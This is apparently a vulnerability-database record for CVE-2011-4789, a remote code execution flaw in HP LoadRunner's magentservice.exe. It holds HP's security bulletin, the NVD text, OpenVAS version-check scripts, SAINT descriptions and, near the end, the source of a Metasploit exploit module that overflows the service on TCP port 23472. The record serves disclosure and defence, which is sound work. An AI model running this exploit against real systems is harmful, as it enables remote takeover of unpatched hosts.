[security bulletin] HPSBMU02785 SSRT100526 rev.1 - HP LoadRunner Running on Windows, Remote Execution of Arbitrary Code
2012-06-03T00:00:00
ID SECURITYVULNS:DOC:28103 Type securityvulns Reporter Securityvulns Modified 2012-06-03T00:00:00
Description
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03216705
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03216705
Version: 1
HPSBMU02785 SSRT100526 rev.1 - HP LoadRunner Running on Windows, Remote Execution of Arbitrary Code
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2012-05-29
Last Updated: 2012-05-29
Potential Security Impact: Remote execution of arbitrary code
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP LoadRunner
running on Windows. The vulnerability can be exploited remotely to execute
arbitrary code.
References: CVE-2011-4789, ZDI-CAN-1259, ZDI-12-016
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP LoadRunner v11.00 before patch 4 running on Windows
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
  Reference            Base Vector                 Base Score
CVE-2011-4789    (AV:N/AC:L/Au:N/C:C/I:C/A:C)         10.0
===========================================================
 Information on CVSS is documented
 in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided HP LoadRunner 11.00 patch 4 to resolve the vulnerability. The
patch is available here: http://support.openview.hp.com/selfsolve/patches
Note: ZDI-12-016 lists the vulnerable product as HP Diagnostics Server.
However, the vulnerable product is actually HP LoadRunner.
HISTORY
Version:1 (rev.1) - 29 May 2012 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact the normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c02964430
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2012 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP nor
its affiliates, subcontractors or suppliers will be liable for
incidental, special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
{"id": "SECURITYVULNS:DOC:28103", "bulletinFamily": "software", "title": "[security bulletin] HPSBMU02785 SSRT100526 rev.1 - HP LoadRunner Running on Windows, Remote Execution of Arbitrary Code", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c03216705\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c03216705\r\nVersion: 1\r\n\r\nHPSBMU02785 SSRT100526 rev.1 - HP LoadRunner Running on Windows, Remote\r\nExecution of Arbitrary Code\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2012-05-29\r\nLast Updated: 2012-05-29\r\n\r\nPotential Security Impact: Remote execution of arbitrary code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP LoadRunner\r\nrunning on Windows. The vulnerability can be exploited remotely to execute\r\narbitrary code.\r\n\r\nReferences: CVE-2011-4789, ZDI-CAN-1259, ZDI-12-016\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP LoadRunner v11.00 before patch 4 running on Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2011-4789 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has provided HP LoadRunner 11.00 patch 4 to resolve the vulnerability. 
The\r\npatch is available here: http://support.openview.hp.com/selfsolve/patches\r\n\r\nNote: ZDI-12-016 lists the vulnerable product as HP Diagnostics Server.\r\nHowever, the vulnerable product is actually HP LoadRunner.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 29 May 2012 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin List: A list of HP Security Bulletins, updated\r\nperiodically, is contained in HP Security Notice HPSN-2011-001:\r\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c02964430\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttp://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2012 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be 
liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits;damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAk/EyG8ACgkQ4B86/C0qfVkxPwCcDGdeVnI4g47duPYt6lKL/4TY\r\ncA4AoN5TzDvqlNAqmE7+ugUS22TS0PEE\r\n=XxFM\r\n-----END PGP SIGNATURE-----\r\n", "published": "2012-06-03T00:00:00", "modified": "2012-06-03T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28103", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2011-4789"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:44", "edition": 1, "viewCount": 2, "enchantments": {"score": {"value": 9.0, "vector": "NONE", "modified": "2018-08-31T11:10:44", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4789"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:109177"]}, {"type": "saint", "idList": ["SAINT:89D9700DBB0B66D8E27B7CDCB47A9902", "SAINT:BC6A289F830FFB1BFC0E0A00A5C37ED3", "SAINT:7FF37BF05F3FC99D6E72FB18252B32B8"]}, {"type": "exploitdb", "idList": ["EDB-ID:18423"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12998", 
"SECURITYVULNS:DOC:27557", "SECURITYVULNS:DOC:29247", "SECURITYVULNS:VULN:12143"]}, {"type": "openvas", "idList": ["OPENVAS:802386", "OPENVAS:1361412562310802386"]}, {"type": "nessus", "idList": ["HP_LOADRUNNER_CVE-2011-4789.NASL", "HP_LOADRUNNER_11_PATCH4_CODE_EXEC.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/MISC/HP_MAGENTSERVICE"]}, {"type": "zdi", "idList": ["ZDI-12-016"]}], "modified": "2018-08-31T11:10:44", "rev": 2}, "vulnersScore": 9.0}, "affectedSoftware": []}
{"cve": [{"lastseen": "2021-02-02T05:51:09", "description": "Stack-based buffer overflow in magentservice.exe in the server in HP LoadRunner 11.00 before patch 4 allows remote attackers to execute arbitrary code via a crafted size value in a packet. NOTE: it was originally reported that the affected product is HP Diagnostics Server, but HP states that \"the vulnerable product is actually HP LoadRunner.\"", "edition": 4, "cvss3": {}, "published": "2012-01-13T04:14:00", "title": "CVE-2011-4789", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4789"], "modified": "2012-11-28T04:31:00", "cpe": ["cpe:/a:hp:diagnostics:*"], "id": "CVE-2011-4789", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4789", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:diagnostics:*:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-05-15T17:29:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4789"], "description": "This host is running HP Diagnostics Server and is prone to\n buffer overflow vulnerability.", "modified": "2020-05-13T00:00:00", "published": "2012-02-01T00:00:00", "id": "OPENVAS:1361412562310802386", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802386", "type": "openvas", "title": "HP Diagnostics Server 'magentservice.exe' Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP 
Diagnostics Server 'magentservice.exe' Buffer Overflow Vulnerability\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:hp:diagnostics_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802386\");\n script_version(\"2020-05-13T09:51:33+0000\");\n script_cve_id(\"CVE-2011-4789\");\n script_bugtraq_id(51398);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-13 09:51:33 +0000 (Wed, 13 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-02-01 14:14:14 +0530 (Wed, 01 Feb 2012)\");\n script_name(\"HP Diagnostics Server 'magentservice.exe' Buffer Overflow Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/47574/\");\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2012/Jan/88\");\n script_xref(name:\"URL\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-12-016/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"Buffer 
overflow\");\n script_dependencies(\"gb_hp_diagnostics_server_detect.nasl\");\n script_mandatory_keys(\"hp/diagnostics_server/detected\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation may allow remote attackers to execute\n arbitrary code within the context of the application or cause a denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"HP Diagnostics Server 9.00.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an error within the magentservice.exe process\n when processing a specially crafted request sent to TCP port 23472 and causing\n a stack-based buffer overflow.\");\n\n script_tag(name:\"summary\", value:\"This host is running HP Diagnostics Server and is prone to\n buffer overflow vulnerability.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since\n the disclosure of this vulnerability. Likely none will be provided anymore. General solution options\n are to upgrade to a newer release, disable respective features, remove the product or replace the\n product by another one.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_equal(version:vers, test_version:\"9.00\")) {\n report = report_fixed_ver(installed_version:vers, vulnerable_range:\"Equal to 9.00\", install_path:path);\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:10:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4789"], "description": "This host is running HP Diagnostics Server and is 
prone to\nbuffer overflow vulnerability.", "modified": "2017-04-21T00:00:00", "published": "2012-02-01T00:00:00", "id": "OPENVAS:802386", "href": "http://plugins.openvas.org/nasl.php?oid=802386", "type": "openvas", "title": "HP Diagnostics Server 'magentservice.exe' Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_hp_diagnostics_server_magentservice_bof_vuln.nasl 5999 2017-04-21 09:02:32Z teissa $\n#\n# HP Diagnostics Server 'magentservice.exe' Buffer Overflow Vulnerability\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_solution = \"Upgrade to HP LoadRunner 11.0 patch4 or later,\nFor updates refer to http://www.hp.com/ \";\n\ntag_impact = \"Successful exploitation may allow remote attackers to execute\narbitrary code within the context of the application or cause a denial of service\ncondition.\n\nImpact Level: System/Application\";\n\ntag_affected = \"HP Diagnostics Server 9.00\";\n\ntag_insight = \"The flaw is due to an error within the magentservice.exe process\nwhen processing a specially crafted request sent to TCP port 23472 and causing\na stack-based buffer overflow.\";\n\ntag_summary = \"This host is running HP Diagnostics Server and is prone to\nbuffer overflow vulnerability.\";\n\nif(description)\n{\n script_id(802386);\n script_version(\"$Revision: 5999 $\");\n script_cve_id(\"CVE-2011-4789\");\n script_bugtraq_id(51398);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-21 11:02:32 +0200 (Fri, 21 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-01 14:14:14 +0530 (Wed, 01 Feb 2012)\");\n script_name(\"HP Diagnostics Server 'magentservice.exe' Buffer Overflow Vulnerability\");\n\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/47574/\");\n script_xref(name : \"URL\" , value : \"http://seclists.org/bugtraq/2012/Jan/88\");\n script_xref(name : \"URL\" , value : \"http://www.zerodayinitiative.com/advisories/ZDI-12-016/\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n 
script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"gb_hp_diagnostics_server_detect.nasl\");\n script_require_ports(\"Services/www\", 2006, 23472);\n script_require_keys(\"hpdiagnosticsserver/installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\n## HP Diagnostics Server and magentservice port\nhpdsPort = get_http_port(default:2006);\nmagentPort = 23472;\n\nif(!get_port_state(hpdsPort) || !get_port_state(magentPort)){\n exit(0);\n}\n\n##Get Version from KB\nhpdsVer = get_kb_item(\"www/\" + hpdsPort+ \"/HP/Diagnostics_Server/Ver\");\n\nif(hpdsVer)\n{\n if(version_is_equal(version:hpdsVer, test_version:\"9.00\")){\n security_message(magentPort);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2016-10-03T15:01:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4789"], "description": "Added: 01/26/2012 \nCVE: [CVE-2011-4789](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4789>) \nBID: [51398](<http://www.securityfocus.com/bid/51398>) \nOSVDB: [78309](<http://www.osvdb.org/78309>) \n\n\n### Background\n\nHP Diagnostics software monitors application transaction health in traditional, virtualized and cloud environments. \n\n### Problem\n\nA vulnerability exists in the way the magentservice.exe service handles network requests. Subtraction is applied to part of the packet to determine how much memory to allocate. If a message is crafted such that an integer wrap occurs during this subtraction, a stack overflow may occur, which may allow an attacker to gain execution control. 
\n\n### Resolution\n\nA patch is not available at the time of publication. Limit access to TCP port 23472. \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-12-016/> \n\n\n### Limitations\n\nThis exploit has been tested against HP Diagnostics Server 9.10 on Windows Server 2003 SP2 English (DEP OptOut) with KB956802 and KB2393802. \n\nExploit requires the IO-Socket-SSL PERL module to be installed on the scanning host. This module is available from <http://www.cpan.org/modules/by-module/IO/>. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2012-01-26T00:00:00", "published": "2012-01-26T00:00:00", "id": "SAINT:89D9700DBB0B66D8E27B7CDCB47A9902", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/hp_diagnostics_magentservice_intwrap", "type": "saint", "title": "HP Diagnostics Server magentservice.exe Integer Wrap", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:35", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4789"], "description": "Added: 01/26/2012 \nCVE: [CVE-2011-4789](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4789>) \nBID: [51398](<http://www.securityfocus.com/bid/51398>) \nOSVDB: [78309](<http://www.osvdb.org/78309>) \n\n\n### Background\n\nHP Diagnostics software monitors application transaction health in traditional, virtualized and cloud environments. \n\n### Problem\n\nA vulnerability exists in the way the magentservice.exe service handles network requests. Subtraction is applied to part of the packet to determine how much memory to allocate. If a message is crafted such that an integer wrap occurs during this subtraction, a stack overflow may occur, which may allow an attacker to gain execution control. \n\n### Resolution\n\nA patch is not available at the time of publication. Limit access to TCP port 23472. 
\n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-12-016/> \n\n\n### Limitations\n\nThis exploit has been tested against HP Diagnostics Server 9.10 on Windows Server 2003 SP2 English (DEP OptOut) with KB956802 and KB2393802. \n\nExploit requires the IO-Socket-SSL PERL module to be installed on the scanning host. This module is available from <http://www.cpan.org/modules/by-module/IO/>. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2012-01-26T00:00:00", "published": "2012-01-26T00:00:00", "id": "SAINT:7FF37BF05F3FC99D6E72FB18252B32B8", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/hp_diagnostics_magentservice_intwrap", "title": "HP Diagnostics Server magentservice.exe Integer Wrap", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:19:27", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4789"], "edition": 2, "description": "Added: 01/26/2012 \nCVE: [CVE-2011-4789](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4789>) \nBID: [51398](<http://www.securityfocus.com/bid/51398>) \nOSVDB: [78309](<http://www.osvdb.org/78309>) \n\n\n### Background\n\nHP Diagnostics software monitors application transaction health in traditional, virtualized and cloud environments. \n\n### Problem\n\nA vulnerability exists in the way the magentservice.exe service handles network requests. Subtraction is applied to part of the packet to determine how much memory to allocate. If a message is crafted such that an integer wrap occurs during this subtraction, a stack overflow may occur, which may allow an attacker to gain execution control. \n\n### Resolution\n\nA patch is not available at the time of publication. Limit access to TCP port 23472. 
\n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-12-016/> \n\n\n### Limitations\n\nThis exploit has been tested against HP Diagnostics Server 9.10 on Windows Server 2003 SP2 English (DEP OptOut) with KB956802 and KB2393802. \n\nExploit requires the IO-Socket-SSL PERL module to be installed on the scanning host. This module is available from <http://www.cpan.org/modules/by-module/IO/>. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2012-01-26T00:00:00", "published": "2012-01-26T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/hp_diagnostics_magentservice_intwrap", "id": "SAINT:BC6A289F830FFB1BFC0E0A00A5C37ED3", "type": "saint", "title": "HP Diagnostics Server magentservice.exe Integer Wrap", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:42", "description": "", "published": "2012-01-28T00:00:00", "type": "packetstorm", "title": "HP Diagnostics Server magentservice.exe Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4789"], "modified": "2012-01-28T00:00:00", "id": "PACKETSTORM:109177", "href": "https://packetstormsecurity.com/files/109177/HP-Diagnostics-Server-magentservice.exe-Overflow.html", "sourceData": "`require 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = AverageRanking \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'HP Diagnostics Server magentservice.exe overflow', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in HP Diagnostics Server \nmagentservice.exe service. By sending a specially crafted packet, an attacker \nmay be able to execute arbitrary code. Originally found and posted by \nAbdulAziz Harir via ZDI. 
\n}, \n'Author' => \n[ \n'AbdulAziz Hariri', # Original discovery \n'hal', # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['OSVDB', '72815'], \n['CVE', '2011-4789'], \n['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-016/'] \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'seh', \n'SSL' => true, \n'SSLVersion' => 'SSL3' \n}, \n'Payload' => \n{ \n'Space' => 1000, \n'BadChars' => \"\\x00\", \n'StackAdjustment' => -3500 \n}, \n'Platform' => 'win', \n'DefaultTarget' => 0, \n'Targets' => \n[ \n[ \n'Diagnostics Server 9.10', \n{ \n# pop esi # pop ebx # ret 10 \n# magentservice.exe \n'Ret' => 0x780c8f1f \n} \n] \n], \n'DisclosureDate' => 'Jan 12 2012')) \n \nregister_options([Opt::RPORT(23472)], self.class) \nend \n \ndef exploit \n \nreq = \"\\x00\\x00\\x00\\x00\" \nreq << rand_text_alpha_upper(1092) \nreq << generate_seh_payload(target.ret) \n \nconnect \nsock.put(req) \n \nhandler \ndisconnect \n \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/109177/hp_magentservice.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-02T09:41:56", "description": "HP Diagnostics Server magentservice.exe overflow. CVE-2011-4789. 
Remote exploit for windows platform", "published": "2012-01-27T00:00:00", "type": "exploitdb", "title": "HP Diagnostics Server magentservice.exe Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4789"], "modified": "2012-01-27T00:00:00", "id": "EDB-ID:18423", "href": "https://www.exploit-db.com/exploits/18423/", "sourceData": "require 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'HP Diagnostics Server magentservice.exe overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in HP Diagnostics Server\r\n\t\t\t\tmagentservice.exe service. By sending a specially crafted packet, an attacker\r\n\t\t\t\tmay be able to execute arbitrary code. Originally found and posted by\r\n\t\t\t\tAbdulAziz Harir via ZDI.\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'AbdulAziz Hariri', # Original discovery\r\n\t\t\t\t\t'hal', # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['OSVDB', '72815'],\r\n\t\t\t\t\t['CVE', '2011-4789'],\r\n\t\t\t\t\t['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-016/']\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'seh',\r\n\t\t\t\t\t'SSL' => true,\r\n\t\t\t\t\t'SSLVersion' => 'SSL3'\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'StackAdjustment' => -3500\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Diagnostics Server 9.10',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t# pop esi # pop ebx # ret 10\r\n\t\t\t\t\t\t\t# magentservice.exe\r\n\t\t\t\t\t\t\t'Ret' => 
